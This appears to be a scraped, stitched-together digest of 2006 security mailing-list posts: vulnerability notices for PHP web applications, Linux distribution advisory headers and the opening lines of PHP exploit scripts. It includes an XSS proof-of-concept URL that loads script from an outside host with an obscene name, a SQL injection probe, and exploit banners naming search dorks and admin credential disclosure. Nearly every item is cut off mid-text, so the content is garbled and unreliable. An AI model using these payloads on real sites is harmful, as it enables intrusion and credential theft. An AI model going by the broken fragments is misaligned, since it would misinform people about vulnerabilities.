ECHO_ADV_38$2006
---
[ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include
Vulnerabilities
Photocycle v1.0
Homepage
http://adambrown.info/p/tools/photocycle
XSS vuln on phpage var:
PoC
http://www.example.com/photocyclephpage=script%20src=http://www.youfucktard.com/xss.js/script
ScozNews Final-Php =1.1 Remote File Inclusion Vulnerability
--
Discovered By: XORON
--
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
--
script site: www.scoznet.com
Orbitmatrix PHP Script v1.0
Homepage:
http://www.orbitcoders.com/
Affected files:
index.php
Possible SQL injection?:
http://www.example.com/index.php?page_name='
And by trying an XSS vuln as shown below on page_name we see the query below
which is displayed on screen:
Flipper Poll = 1.1.0 Remote File Inclusion Vulnerability
--
Discovered By: XORON
--
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
--
Exploit:
===
Ubuntu Security Notice USN-317-1 July 13, 2006
zope2.8 vulnerability
CVE-2006-3458
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
This
===
Ubuntu Security Notice USN-318-1 July 13, 2006
libtunepimp vulnerability
http://bugs.musicbrainz.org/ticket/1764
===
A security issue affects the following Ubuntu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:122
http://www.mandriva.com/security/
12/07/2006 19.11.54
- Flatnuke 2.5.7 arbitrary file upload / remote code execution -
software:
site: http://www.flatnuke.org/
if user Gallery uploads are enabled (not the default) you can go to:
#!/usr/bin/php -q -d short_open_tag=on
?
echo PHORUM 5 arbitrary local inclusion exploit\n;
echo by rgod [EMAIL PROTECTED];
echo site: http://retrogod.altervista.org\n;;
echo dork: \This forum powered by Phorum.\\n\n;
/*
works with:
register_globals=On
magic_quotes_gpc=Off
*/
if
#!/usr/bin/php -q -d short_open_tag=on
?
echo PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials
disclosure\n;
echo by rgod [EMAIL PROTECTED];
echo site: http://retrogod.altervista.org\n;;
echo dork, version specific: \Powered by phpBB * 2002, 2006 phpBB
Group\\n\n;
/*
Hello,
On Thu, 13-07-2006 at 01:35 +, [EMAIL PROTECTED] wrote:
require_once( $mosConfig_absolute_path .
'/includes/domit/xml_domit_lite_include.php' );
Variables $mosConfig_absolute_path are not properly sanitized.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:123
http://www.mandriva.com/security/
---
perForms = 1.0 ([mosConfig_absolute_path]) Remote File Inclusion
---
Remote : Yes
Critical Level : High
Vuln found in a log file: lazy
rPath Security Advisory: 2006-0122-2
Published: 2006-07-07
Updated:
2006-07-13 Upgraded to Critical status with additional information
Products: rPath Linux 1
Rating: Critical
Exposure Level Classification:
Local Root Deterministic Privilege Escalation
Updated Versions:
kernel=/[EMAIL
15 matches